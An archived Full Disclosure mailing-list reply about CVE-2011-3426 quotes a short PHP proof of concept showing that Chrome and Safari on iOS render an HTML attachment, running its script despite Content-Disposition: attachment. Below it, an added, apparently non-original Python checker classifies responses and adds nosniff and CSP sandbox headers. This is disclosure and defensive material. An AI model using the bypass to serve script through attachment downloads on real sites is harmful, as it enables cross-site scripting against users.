Re: [FD] Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS 6.x)
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: Re: [FD] Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS 6.x)
- From: "Securify B.V." <lists@xxxxxxxxxxx>
- Date: Wed, 30 Jul 2014 19:01:28 +0200
This issue was originally reported as CVE-2011-3426. We can confirm that
Mobile Safari on iOS 7.1.2 is still affected. We've reported this to
Apple on February 25, 2014. You can test it yourself at:
http://www.securify.nl/cve-2011-3426.html
This test page sets the following HTTP headers:
Content-Disposition: attachment;filename=cve-2011-3426.html
Content-Type: application/octet-stream
With kind regards,
Yorick
On Tue, 2014-07-29 at 15:56 +0800, heige wrote:
>
> > > Bypassing Content-Disposition: attachment for XSS on Chrome/Safari(IOS)
> > >
> > > by Superhei of KnownSec team (www.knownsec.com) 2013.6.3
> > >
> > > Test Environment
> > > ipad(ios 6.1.3)
> > > Chrome(26.0.1410.53)
> > >
> > > This code is downloader for attachment which is a HTML file.
> > >
> > > <?php
> > > //down.php
> > > header("Content-Type:text/plain");
> > > //header("Content-Type:text/html");
> > > header("Content-Disposition: attachment; filename=\"test.html\"");
> > > echo "<html><script>alert(1)</script></html>";
> > > ?>
> > >
> > > On IOS, when Chrome/Safari visit the down.php, the HTML code will be running. Of course, including the JavaScript, and led to cross-site scripting attacks.
> > >
> >
> from http://www.80vul.com/apple.txt
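The thread shows two header sets (the PHP test page's text/plain + attachment, and the Securify page's application/octet-stream + attachment) whose only protection against the embedded HTML being rendered is the client honouring Content-Disposition: attachment. The following is an added example, not code from either poster or from Securify: a small checker that classifies an HTTP response by whether HTML content is served inline, protected only by the attachment disposition, or sniffable, plus a helper that adds the defensive headers (X-Content-Type-Options: nosniff and a CSP sandbox) commonly recommended for serving untrusted downloads. The sample headers and body are constructed from the thread; whether the affected iOS browsers honoured those defensive headers is an assumption not confirmed by the thread, and the canonical mitigation remains serving user-controlled files from a separate origin.

```python
"""Classify HTTP responses whose safety depends on the client honouring
Content-Disposition: attachment (the CVE-2011-3426 class of browser bug).

Added example; not code from the mailing-list posters or from Securify.
"""
import re

# Constructed sample mirroring the headers the thread describes.
SECURIFY_HEADERS = {
    "Content-Disposition": "attachment;filename=cve-2011-3426.html",
    "Content-Type": "application/octet-stream",
}
DOWN_PHP_HEADERS = {
    "Content-Type": "text/plain",
    "Content-Disposition": 'attachment; filename="test.html"',
}
# Body from the quoted down.php test page (constructed copy).
HTML_BODY = b"<html><script>alert(1)</script></html>"

# Tags whose presence near the start of a body makes a sniffing client
# likely to treat it as HTML. Checked only over the first 1 KiB, which is
# roughly the window sniffing algorithms look at.
HTML_MARKERS = re.compile(rb"<\s*(html|script|body|svg|iframe|head)\b", re.IGNORECASE)


def looks_like_html(body: bytes) -> bool:
    """True if the leading bytes contain an HTML-like tag."""
    return HTML_MARKERS.search(body[:1024]) is not None


def classify_response(headers: dict, body: bytes) -> str:
    """Return one of:
    'inline-html'     : declared text/html, rendered by every client
    'attachment-only' : HTML body, non-HTML type, safe only if the client
                        honours Content-Disposition: attachment
    'sniffable'       : HTML body, non-HTML type, no attachment disposition
    'ok'              : body does not look like HTML
    """
    h = {k.lower(): v for k, v in headers.items()}
    disposition = h.get("content-disposition", "").strip().lower()
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    is_attachment = disposition.startswith("attachment")

    if not looks_like_html(body):
        return "ok"
    if ctype == "text/html":
        return "inline-html"
    if is_attachment:
        return "attachment-only"
    return "sniffable"


def harden(headers: dict) -> dict:
    """Return a copy of headers with defensive headers added.

    nosniff asks the browser not to second-guess Content-Type; a CSP
    sandbox disables script execution if the document is rendered anyway.
    Assumption: these help on clients that implement them; the thread does
    not say whether the affected iOS versions did.
    """
    out = dict(headers)
    out["X-Content-Type-Options"] = "nosniff"
    out["Content-Security-Policy"] = "sandbox"
    return out


def audit(headers: dict, body: bytes) -> dict:
    """Convenience wrapper: verdict plus the hardened header set."""
    return {"verdict": classify_response(headers, body), "headers": harden(headers)}


if __name__ == "__main__":
    for name, hdrs in (("securify", SECURIFY_HEADERS), ("down.php", DOWN_PHP_HEADERS)):
        print(name, audit(hdrs, HTML_BODY)["verdict"])
```

Run against your own download endpoints, an "attachment-only" verdict is the case this thread is about: nothing but the disposition header stands between the stored file and script execution in a client that ignores it.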
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/